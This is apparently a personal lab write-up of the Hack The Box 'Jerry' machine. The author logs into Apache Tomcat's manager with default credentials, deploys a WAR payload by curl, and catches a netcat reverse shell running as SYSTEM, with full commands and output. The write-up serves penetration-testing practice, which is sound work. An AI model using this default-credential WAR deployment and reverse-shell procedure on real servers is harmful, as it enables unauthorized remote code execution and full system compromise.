InfoSec LAB

Jerry_Exploitation

Created: 3 min read

RCE

The most common/usual and easiest way to gain an initial foothold through Apache Tomcat is by uploading and deploying a WAR file and have the web server execute it.

WAR file upload

As I was able to authenticate to the target Tomcat instance using the default credential, I should be able to proceed to uploading and deploying a WAR file

While it is entirely possible to do this via the web GUI, I prefer the command line method.

I got the payload ready. Now I just need to upload and deploy it

┌──(kali㉿kali)-[~/archive/htb/labs/jerry]
└─$ curl -v -u 'tomcat:s3cret' --upload-file rce.war "http://$IP:8080/manager/text/deploy?path=/rce&update=true"
*   Trying 10.10.10.95:8080...
* Connected to 10.10.10.95 (10.10.10.95) port 8080 (#0)
* Server auth using Basic with user 'tomcat'
> PUT /manager/text/deploy?path=/rce&update=true HTTP/1.1
> Host: 10.10.10.95:8080
> Authorization: Basic dG9tY2F0OnMzY3JldA==
> User-Agent: curl/7.86.0
> Accept: */*
> Content-Length: 13317
> Expect: 100-continue
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 100 Continue
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Cache-Control: private
< Expires: Thu, 01 Jan 1970 02:00:00 EET
< X-Content-Type-Options: nosniff
< Content-Type: text/plain;charset=utf-8
< Transfer-Encoding: chunked
< Date: Wed, 05 Apr 2023 15:08:56 GMT
< 
OK - Deployed application at context path /rce
* Connection #0 to host 10.10.10.95 left intact

Uploading and deploying complete

┌──(kali㉿kali)-[~/archive/htb/labs/jerry]
└─$ curl -s http://10.10.10.95:8080/rce/

Triggering

┌──(kali㉿kali)-[~/archive/htb/labs/jerry]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
 
C:\apache-tomcat-7.0.88> whoami
 whoami
nt authority\system
 
C:\apache-tomcat-7.0.88> hostname
 hostname
JERRY
 
C:\apache-tomcat-7.0.88> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::1b
   IPv6 Address. . . . . . . . . . . : dead:beef::805b:2718:e1fc:cd4f
   Link-local IPv6 Address . . . . . : fe80::805b:2718:e1fc:cd4f%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.95
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%11
                                       10.10.10.2
 
Tunnel adapter isatap.{E6565A26-EF2E-43A5-A579-B0F25E7B1DC8}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : htb

The target Tomcat instance was running with the SYSTEM privileges. System Level Compromise

Interactive Graph View

Backlinks